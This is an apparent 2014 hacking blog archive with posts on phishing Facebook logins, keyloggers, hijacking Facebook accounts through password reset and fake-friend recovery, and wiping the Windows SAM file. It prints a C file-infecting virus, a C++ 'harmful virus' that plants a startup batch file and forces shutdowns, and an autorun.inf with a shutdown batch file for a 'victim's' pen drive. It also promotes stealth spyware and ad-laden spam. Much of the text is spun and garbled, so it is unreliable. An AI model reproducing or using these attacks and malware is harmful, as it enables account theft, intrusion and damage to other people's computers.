Thursday, March 13, 2014

hack facebook using pishing


This method is much harder than the rest, but it is also the most prevalent method to chop someone’s account. The most used type of phishing involves developing a fake login web page. The page is usually sent via email to your victim and will appear exactly like the Facebook login web page. If the sufferer logs in, the information will be delivered to you instead involving to Facebook. This process can be difficult because you have got to create a website hosting account and some sort of fake login web page.


click here to download pishing file code
Users are very careful now with logging into Facebook through other links, though, so that only enhances this already difficult process.

How to Protect Yourself

Don’t click on links through e mail. If an email says to you to login to Facebook by way of a link, be careful. Check the WEB SITE. If you’re however doubtful, go directly to the main website and login the method that you always do.
Phishing isn’t only done as a result of email. It can be any link upon any website. Even ads that pop up can be destructive. Don’t click upon any sketchy hunting links that request your information.
Work with an anti-virus similar to Norton or McAfee.
like me on fb







TO know more about facebook hacking click here

hack facebook using pishing


This method is much harder than the rest, but it is also the most prevalent method to chop someone’s account. The most used type of phishing involves developing a fake login web page. The page is usually sent via email to your victim and will appear exactly like the Facebook login web page. If the sufferer logs in, the information will be delivered to you instead involving to Facebook. This process can be difficult because you have got to create a website hosting account and some sort of fake login web page.



Users are very careful now with logging into Facebook through other links, though, so that only enhances this already difficult process.

How to Protect Yourself

Don’t click on links through e mail. If an email says to you to login to Facebook by way of a link, be careful. Check the WEB SITE. If you’re however doubtful, go directly to the main website and login the method that you always do.
Phishing isn’t only done as a result of email. It can be any link upon any website. Even ads that pop up can be destructive. Don’t click upon any sketchy hunting links that request your information.
Work with an anti-virus similar to Norton or McAfee.

hack facebook using key logger


Software Keylogger

Some sort of software keylogger is really a program that may record each stroke around the keyboard that an individual makes, most typically without their understanding. The software should be downloaded manually around the victim’s computer. It will immediately start capturing keystrokes after the computer is started up and remain undetected inside the background. The software might be programmed to send you a summary of all the keystrokes via email.




Hardware Keylogger

These work the same way as it keylogger, except that any USB drive with all the software ought to be connected to the victim’s computer. The USB generate will save a listing of the keystrokes, so it is as simple since plugging it on your own computer and extracting the information. You can look through Keelog for price ranges, but it’s bit above buying the software as you are have the purchase the USB drive with all the program already on it.



How to Protect Yourself

Use a firewall. Keyloggers usually send information through the internet, so any firewall will keep an eye on your computer’s online activity and sniff out anything on your guard.
Install a password manager. Keyloggers can’t steal whatever you don’t type. Password mangers automatically complete important forms without you the need to type anything in.
Update your software package. Once a company knows of any exploits in their software, they work towards an update. Stay behind and you will be susceptible.
Change accounts. If you still don’t feel shielded, you can adjust your password bi-weekly. It may look drastic, but that renders any details a hacker stole useless.

hack facebook account using reset password


Reset the Password
The most effective way to “hack” in someone’s Facebook is through resetting the password. This could become easier done by people who are added in friend list, with anyone they’re trying in order to hack.

The 1st step would be to get your friend’s Facebook email login. If you don’t already know just it, try looking on their Facebook page in the actual Contact Info section.
The 2nd Step would be, click on Forgotten your own password and type from the victim’s email. Their account should show up. Click This is my account.
It will ask if you would like to reset the security password via the victim’s email messages. This doesn’t help, so press No longer have access to these?
It’s going to now ask How can easily we reach you? Type in an email that you’ve got that also isn’t connected to any other Facebook account.
It will now ask you any question. If you’re buddies with the victim, that’s great. If you do not know too much about these, make an educated guess. If you figure that out, you can modify the password. Now you must wait 24 hours to login thus to their account.
Unless you figure out the problem, you can click upon Recover your account along with help from friends. This allows you to choose between three as well as five friends.
It will send them passwords, which you may ask them for, then type into the up coming page. You can either create three to five fake Facebook accounts and add your friend (especially as long as they just add anyone), or you can choose three to five close friends of yours that might be willing to give you the password.

.How to Protect Yourself

Use an email address specifically for your Facebook , nor put that email address on your profile.
When picking a security question and answer, make it difficult. Make it so that no-one can figure it out simply by going through your Facebook. No pet names, absolutely no anniversaries—not even third rank teacher’s names. It’s as easy as looking through a yearbook.
Understand recovering your account through friends. You can find the three friends you want the password sent to. In That way you can protect yourself from the friend and other shared friends ganging up on you to get into your account.

viruse code in oop

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}





How the Virus Program Works?

The algorithm of this virus program is as follows:

Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).

Step-2: Load the copy of the virus itself onto the memory.

Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.

Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.

As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
click here to get more viruse codes

Ways to Keep Your Computer Virus Free:

Email is one of the common ways by which your computer can catch a virus. So, it is always recommended to stay away from SPAM. Open only those emails that has its origin from a trusted source such as those which comes from your contact list.

If you are using your own private email host (other than Gmail, Yahoo, Hotmail etc.) then it is highly recommended that you use a good spam filter. And finally NEVER click on any links in the emails that comes from untrusted sources.

USB thumb/pen drives is another common way by which viruses spread rapidly. So, it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is the safe way to open a pen drive.

Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have an efficient antivirus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).

As we all know, Internet is the main source of all malicious programs including viruses, worms, trojans etc. In fact, Internet contributes to virus infection by up to 80 percent. So, here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum possible extent.

    Do not click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
    You can also use a pop-up blocker to automatically block those pop-ups.

Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So, in order to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from those malicious websites.

Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from viruses. If PC security is your first option then it is recommended that you go for a shareware antivirus software rather than using the freeware stuffs.

Most of the antivirus programs offer the auto-protect feature that provides real-time security for your PC. Make sure that this feature is turned on.

In addition to an antivirus, it is worthwhile to spend a few bucks on a good anti-spyware program. This can provide extra security for your computer.

Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still perform a virus scan before opening them.

Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.

Set up your Windows update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.

While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.

And finally it is recommended not to visit those websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. as they contribute much in spreading of virus and other malicious programs

Ways to Hide IP Address Online

Every computer on the Internet has a unique IP address allotted to it which makes it possible to trace it back to its exact location. Even though the concept of Internet Protocol address has been designed for its transparency and traceability, in some cases this questions the privacy of the Internet user where one would not like to reveal his/her identity to the outside world. Well, if you are one such person who is in search of ways to hide your IP address online, then you are at the right place. In this post, I will discuss some of the easy and popular ways to hide your IP address, so that your identity and privacy is kept safe.

One of the most popular and easy ways to hide your IP address online is to use a proxy server. In simple words, a proxy server is any server that will act as an intermediary between your computer and the Internet. Instead of communicating directly with the websites or Internet resources, here you communicate with the proxy server which then forwards all your requests to the remote server so as to establish a back and forth communication between your computer and the Internet. So, whenever you are hiding behind a proxy, the Internet or the websites you visit will only see the IP address of the proxy server, so that your real IP address is kept hidden. For more information on proxy servers, you may refer my earlier post on what is a proxy server and how it works?
Types of Web Proxies

Here is a list of different types of web proxies that you can try:
Website Based Proxy Servers:

This is the simplest of all methods. There are many websites on the Internet that provide free and paid proxy service for the users without having to install any piece of software program on their computer. The following are some of the popular websites that offer proxy service:

    www.hidemyass.com
    www.newipnow.com
    anonymouse.org
    proxify.com
    smarthide.com

The above websites provide a field to enter the URL of the target website that you want to visit anonymously. Once you submit, they will establish a connection with the target site and presents you back with the intended page that you are trying to browse. The downside of using these free services is that, some of them will not offer a secured connection (SSL) and you will often be presented with annoying ads and pop-ups during the course of your browsing. However, you can avoid these by becoming a paid user.
Browser Configured Proxy Servers:

There are hundreds of freely available open proxies that can be found on the Internet. You can obtain the IP address of one of those freely available proxy servers and configure your browser to start using them. However, as they are openly available to public, most of them are either bottlenecked or perform too slow on normal conditions.
Program Based Proxy Servers:

A program based proxy server requires you to install a program on your computer and configure its settings. These provide you with an option to start hiding your IP address with just a click of a button. They automatically connect your computer to a private high speed anonymous proxy server to provide best performance. You also have the option to choose proxies based on location such as countries. The advantage of using this type of proxy is that, it is not limited to a single browser. That means, your computer’s entire web traffic is routed through the proxy, there by guaranteeing you with a highest level of privacy.

Most of these programs come with a free trial where you are required to pay once the trial period expires. The following are some of the popular program based web proxies:

how to protect youre cell phone from hackers

Businesses requirement to manage clients proficiently and viably calls for a steady change in their telephone framework. What’s more, they have to minimise issues, for example, unauthorised utilization of telephone services and toll fraud (Phone Hacking). One of the real tests is to screen the uncalled for utilization of corporate correspondence offices for toll calls. The abuse of authorisation codes is a significant concern for different sorts of businesses. Toll fraud can happen with TDM and IP-based voice frameworks. From representatives that try to make a couple of free calls to programmers, any telephone framework could be helpless. Notwithstanding, call logging programming can dispose of this issue by guaranteeing that a phone framework is not traded off. Call logging includes catching call records, archiving them in a database, and after that recovering them by method of a reporting interface.

Call logging programming can track toll misrepresentation and give cautions and reports of abnormal phone action. The programming enactss as a framework watchdog for VoIP requisitions, cautioning overseers of any suspicious calling movement. This incorporates calls to global ends of the line, visit lines, stimulation services, grown-up services, and that’s just the beginning. In the period of terrorism, it is paramount for calls to be followed.

Reports prepared by call logging programming might be utilized to build business effectiveness with extra mixed programming modules. Phone call information might be gathered and broke down for different purposes incorporating the overseeing of expenses. By taking a gander at these records, a business can figure out toll duplicity as well as screen the expense of calls and make important move to lessen such takes. It is likewise conceivable to figure out the amount of unused or abused developments in a system.

Call logging programming likewise empowers businesses to enhance the execution of workers by examining how rapidly they address inbound calls. The information could be utilized to prepare and order staff to end up additional profitable. With security being a real concern, it is critical to pick the right telephony framework, for example, Cisco Phones and Mitel Phones that offer call logging characteristics to help avoid dangers, for example, toll cheating. Cisco IP Phone s emphasize the bound together interchanges framework that gives clients a protected correspondences system.
Counteractive Action is Superior to Cure:

So what pragmatic measures can telecom or IT administrators take to help anticipate being an alternate casualty of wrongdoing?

A standout amongst the best methodologies to enhancing the security of telephony frameworks incorporates leading customary reviews of:

    Station benefits and confinements
    Voice and information calling examples
    Public and private system steering access
    Automatic way determination
    Software characterized systems
    Private exchanged and pair systems

Different measures incorporate evaluating the design of your PBX in the light of known programmer methods and looking at arrangement portions against best practice and any administrative prerequisites that may relate to your industry area.

Guarantee default voicemail and support passwords are changed and acquaint an arrangement with anticipate effectively guessable passwords being utilized.

Verify that the arrangement requests consistent watchword changes and make moves to guarantee the approach is authorized.

Introducing a call logging result, to furnish notice of suspicious action on your PBX, is a convenient measure and one that can frequently bear the cost of profitable unanticipated cautioning of a strike. Audit existing PBX control works that could be at danger or which could permit slips to happen, as well.

Be conscious that numerous voice frameworks now have an IP address and are in this way associated with your information system – evaluate what procurements you need to section both systems. Security exposures can likewise come about because of the way various PBX stages are joined over a corporate system or from interconnectivity with existing provisions.

Research and examine working framework shortcomings – incorporating explanatory discoveries, make suggestions, prioritisation and alleviation or conclusion needs – and execute a standard calendar of exploring server administration packs, patches, hot-fixes and against infection programming.

Call logging programming is utilized by numerous businesses over the globe to screen and oversee phone calls, cut expenses, and increment bargains and benefit. In this way, little and medium ventures with a fundamentally high calling action should think about putting resources into call logging software.

Good phone systems are very useful when doing business in any company. The managers, employees, owners of the businesses, suppliers and the consumers of the company goods and services use phone systems to communicate to each other making the process of goods and services easy to produce and offer to their clients. Clients will ask questions and give their feedback through the phone. This makes the service delivery more professional and many client will prefer a company with a good phone framework and this will increase the profits in the business.

hack windows pass word


Delete Administrator Password Without any software
Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)

click here to know more ricks 

Friday, March 7, 2014

a harmful virus code


1-Open notepad
2-Copy This code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-Save It As Game.Bat
4-finish
click here to get more virus codes 

how to hack friends pc using pendrive

In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College,school,institute....and Fun With Friends

Step 1:>>copy this  code into notepad:
@echo off
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat).
Step 2:
      Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable

   Save it as "autorun.inf"
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Check How to Disable This:-

First Stop Autorun in Your Computer And Then Format Pendrive..

click here to know more pendrive tricks

Wednesday, March 5, 2014

how to make money online (earn money from face book )


hai;
 Here i can help you. I know people loves online money making without any investment, and i will show you how it is possible.

There are many ways to make cash online, but here you can find only trusted and easy online money makings ways, that is why my list is small. But this information really helps you as a beginner guide of online money making.

When i was a beginner of online money making world i also searched for easy cash making ways and earn money by playing online games. I searched many websites and visited many blogs for online money making ways, but everyone fool me. When i try to search for money making ways on web many websites offer me big cash making ways daily, and they force me to complete their surveys, trial offers and sign up offers, after completing their surveys they ask me my email id for sending money making information and they really send me some information, but the problem is, that all need an opening investment or registration fee to continue. Then i realize they always trying to fool me and i have no use with their cash making information.




From my continues search for online money making i also get some good, trusted, easy and zero investment cash making ways. And I concluded, in the web fraud online money making websites are more than real websites. Trusted money making websites only countable. That is the reason why i created this website, i want my friends never fall into a scam world


ok. i m jest introducing you how to make money from face book do you intrested to know more?
jest"click on the below image"
its a advetising program you can earn more money
 click here to know more

Monday, March 3, 2014

Monitoring Your Home or Office Computer with Computer Monitoring Software

If you think you could benefit from knowing what happens on your home or office computer while you’re away from it then computer monitoring software could be for you. What reasons could you have for wanting to knowwhat happens? You may have children who you think are playing to many PC games when they should be doing home work. You may have a husband who you suspect of online gambling when you’re out the house. Or you may have employees who you think are looking at Facebook and Twitter all day, rather than doing work! Whatever the reason, there is a solution. There are a wide range of computer monitoring applications, available in abundance online, all of which designed to suit a specific need. The software comes in many forms: computer monitoring software, classroom monitoring software, employee monitoring software. All of these essentially do the same job, but have some minor alterations to make it more suitable for the environment it’s installed in. That being said, most monitoring applications will have the same basic set of features. For example, most will work in stealth, so that once the program is installed it will not be seen by users of the PC, and will not be findable in places like the start menu or program files directory. The only way to open monitoring software is to enter a secret combination of keys (usually something like control+alt+F6) and then your password. You’ll then be able to control the software and take a look at the results. Computer Monitoring Software The results will vary depending on the developer and the type of software you have. Normal computer monitoring software is what you’d install on a single to computer and is what we’ll focus on in this article. With your average monitoring software you’ll be able to monitor the following: Any website visited, along with anything typed into that site. Any program used, along with anything typed into that program. Any file activity, including deleted, moved or created files. Anything printed. Anything copied and pasted to and from the clipboard. All of this will usually be shown in the results along with the date and time of the said activity. ‘Anything typed’ will also include passwords, emails and instant messages along with any documents typed into applications like Microsoft Word. Another feature that most users find helpful is the email reports feature. This allows you to have the results emailed to your inbox every X minutes or hours, to save you having to log back into the target computer every time you want to sift through the logs. Some monitoring programs also have the ability to log into your account via their website, and to look through logs there; programs that have this feature tend to be more expensive though, or have a monthly subscription. As mentioned before, this is a standardized set of features that you’ll find in most monitoring applications. Although, some will slightly different features, and some will have more. Advanced monitoring software can include extra features like web cam and microphone monitoring, self uninstall on a certain date, and the ability to watch the computer in real-time, but again, the price of the software will reflect this. . . Variations in monitoring software will reflect what the software is for. As mentioned above, employee and classroom monitoring software are different types that will have the same features as the ones mentioned above, plus some that makes the lives of employers and teachers slightly easier. For example, some employee and classroom monitoring software (these types are separate but are mentioned together for their similarities) have the ability to monitor all employees screens at once from the single ‘boss or teacher’ computer, to control those screens remotely, to block or activate certain websites or applications, and to see productivity reports for each targeted computer. Once again, the price for employee or classroom monitoring can be a lot more expensive than single computer monitoring software, and can sometimes be priced according to the number of computers you want to monitor. Monitoring applications of all types can be found pretty easily online, and most will have a free trial so that you can test before you buy. Gecko Monitor is a well known, standard computer monitoring solution, and is available with a free trial from their website at http://www.geckomonitor.com

increes you tube trafic 50 tips

A) Keyword Research using Youtube’s Keyword Tool

1. Create the videos viral, and spread them to as many blogs as you possibly can. Easy way, when you finish to publish a movie on Youtube, create an article and embed the video with your Web page.

2. Like a usual blog post, it’s important that your Youtube video also becomes social signals. Share and submit your own videos to popular web 2 . 0 and bookmarking sites such as Twitter, Google plus, Zynga, Digg. You can also reveal your videos on Fan pages and enquire users to comment in addition to like your video.

3. Making a video is not plenty of, you need to look after professional touch. You are able to use video editing tools or perhaps better hire a Video editor to add final effects on your own videos..

4.  Make sure the sound with your videos is clear in addition to mixed and edited effectively so users can plainly hear it.

5.  Keep content funny, informative & engaging so viewers will watch it from beginning to end.

6.  Try and keep the video tutorials you create clean without an excessive amount controversial material.

7. Embed your logo and website into the video somehow. That you can do this with text by the end or beginning, or by including your logo or URL throughout the entire video.

8.  Have goals to your YouTube video tutorials, but remember there are thousands of videos on the site, and some have an incredible number of hits while others only use a couple hundred. Set realistic goals.

9.  Be sure to have good digicam and editing products. If you don’t wish to sink the money into these things, consider hiring an expert.

10. Keep the resolution on the video as high as possible, so it’s as clear as it can be.

.

b) Tag Updates/Spy on the competition

11. Think about general color schemes. Some videos may record in a yellow or crimson hue. This make a difference to viewer’s opinions subliminally, so make an effort to keep the shades realistic

12. Keep positive attitude, Do not lose focus from the purpose & your task on the video. Be yourself and take it easy when speaking.

13. Remember that few things are perfect in videos unless you then have a professional editor, so just have fun and keep the goal in mind.

14. Practice before posting the last video. Do several dry runs just before taping and creating.

15. Create a group of ongoing videos and stories, so users are going to be hooked up and want for more information.

16. Do more than just talk. People don’t want to sit & watch somebody just talking to the camera. Make it fascinating and interesting in addition to fun.

17. Try to restriction on the video to a few minutes if possible. After about two and a half minutes, users have a tendency to lose curiosity and move onto something more important.

18. Stick to a schedule when you record a collection, otherwise people will just give up the videos. Be sure you release the next ones by the due date.

19. Have a sign off men and women will remember, then adhere to it. This creates an expression of branding.

20. Request feedback from ones viewer. Some people won’t comment unless you ask them to.

.

c) Title Tag optimization

21. Assemble a forged of characters. Use individuals in movies beside yourself. Recruit friends and co workers to be actors inside the videos.

22. Don’t use music in background of your video, you do not have legal authorization under the law.

23. Obviously the title of the video is simple & important as necessary.

24. Grab viewers simply by integrating important keywords in to the title. This also helps boost the search engine.

25. Use tags beyond just the keywords, as which gets peoples’ focus.

26. If people placed negative comments, overlook them. By “feeding the trolls” you happen to be encouraging their bad behavior and in ways something you regret down the line. Enable comment small amounts for uploaded video clips, and accept true and meaningful comment to help keep the comment quality on your Youtube channels.

27. Use as many places as you can to embed ones video, like Fb, MySpace, Digg, Tweets, your home page, and many other areas.

28. Let your mail subscribers and customers know when a new video is posted.

29. Add your online video to several communities and subject areas of YouTube regarding more exposure.

30. Make sure you thank people exactly who post positive comments or consider themselves followers of your respective videos.

.

d) Description optimization

31. Be aware that not all videos you create will be a hit. It is a hit and miss venture, so be patient and practice making good videos.

32. Write the script in advance. While impromptu videos are fun, it’s really easy to mess up the vision when you improvise.

33. Use tools similar to YouTube Insight to track your visitors and hits.

34. Must use this word video in your title, because people mostly use this word, and will surely step into search engines.

35. Don’t use your video as an advertisement. In other words, get a point across but do it without trying to sell something.

36. Pick the thumbnail wisely. Youtube really lets users choose their thumbnails so practice it carefully and thoughtfully.

37. You can erase comments, so do not hesitate to get rid of negative or impolite comments under ones video.

38. You can release multiple video at when, so if you have several each time, feel free to accomplish this.

39. Be real , nor try to phony out your audiences. Most people can spot a phony video or a thing that isn’t sincere.

40. Enjoy the fun and focus, so you’re developing something people would want to share and forwards to others.

.

e) Youtube Analytics

41. Beside from your logo as well as website, include an easy method for people to contact you or our business via electronic mail.

42. Watch others as well as learn. By viewing other videos which are related to your small business, you can get yourself a feel for what folks are doing, and what others are saying about it.

43. Follow your target Visitors. Don’t try to branch out too far from your objective, or you could easily lose dependable followers.

44. Publish webcam live video lessons. Have a webcam located at the office, or additional location, and then upload this onto your YouTube channel. It’s a fun strategy to get others involved in the day to time operations of what you do.

45. Make a route and profile. This gives viewers a property base to consider your videos and check on any new ones.

46. Do not utilize cuss words as well as inappropriate language and also behavior.

47. Use props, halloween costumes, and other “organic” things inside your video. Fancy editing will not always make for top viewing.

48. Try to open each video with a small montage, song, or your logo, so that people easily recognize your business or who you are.

49. Utilize Yahoo Video and also other sites to get your video exposed to help other audiences.

50. Stipulate your channel type, and have a definite sense of precisely what you’re offering about the channel’s main page.

.

Youtube is probably the high traffic website and if you are using it wisely you can easily drive huge traffic coming from youtube. I hope you liked this post and if you discover it worth sharing, don’t forget to share this post on stumbleupon and twitter.

Sunday, March 2, 2014

How to Convert Smartphone into Remote Control






Convert your smartphone into Remote Control

As we all know that now a days using remote control we control many electronic devices, Such as Television, music System, Car, etc. for all of these we used different different devices or we can say that for all of these devices we used different remote control, but, if we find only one  common remote control and using this remote control we control all the devices !, such this type of remote control we can say “Universal Remote Control”. You can make your smartphone a universal remote control. For this you just need to instilled some applications in to your smartphone.

 .

Start your Car from anywhere with your Smartphone

Viper SmartStart (Free app) using this application you can lock and unlock you car and you can also start your car, even also you can find your car location. You can install and download this apps from Google play store, iTunes Store as well on your windows phone.

 .

To control home appliances

for controlling home appliances, Home automation maker company “Crestron” provides remote control application for home appliances called “Crestron apps” . Using this application you can use your smartphone as a remote control. This apps connected with wi-fi and control home appliances. This apps are available in two version for android user, first one is free and second one is paid (you need to pay approx 5000 Rs. To installed). iPhone user can installed this apps from iTunes store.

 .



.

To Control your Personal Computer

You can installed Gmote Application in to your smartphone to control your personal computer through your smartphone for this you need to installed Gmote Clint Application in your smartphone  then after you need to installed Gmote server then after you can control your personal computer through you smartphone.

 .

Touch mouse Application

Touch mouse designed by Logitech, using this application you can use your iPhone and iPad touch to your PC’s keyboard and trackpad, Using WiFi Touch Mouse can be used.

 .

Logitech Harmony Smart Control

Using logitech’s this application you can make your android and iPhone smartphone as a universal remote control, using this application your smartphone work at least 8 different remote control such as Tv, Music System, gaming etc included.

If your smartphone is not with you at this time you can use one general remote control that come with this application, this application price is $ 129

how to crack wifi using cmd



http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=41316&cid=9758&cuid=3pzbb2j&ad=11448&subid=&opt1=&opt2= 1 Go to Start. In the search box, type in "cmd". If your Start menu has the Run command, click Run and type "cmd" in the field.

2 Type"ipconfig" using the cursor.

3 Hit Enter. On your screen, you will see a series of names and numbers. Look for the line that says Default Gateway. Write down the number that you see next to Default Gateway

4 Navigate to Google or another search engine. In the address bar, type in the number that you just wrote down.

http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=41316&cid=9758&cuid=3pzbb2j&ad=11448&subid=&opt1=&opt2= 5 Hit Enter. You will see another screen that has fields to enter your username and password. The username is "admin", and the password is either "admin" or "1234". Enter that information into the appropriate fields. Click the "Log In" button.

6 Go to the Wireless tab on the website that pops up. If you scroll down, you should find something called password. Write down your password and put it in a safe place in case you forget it again.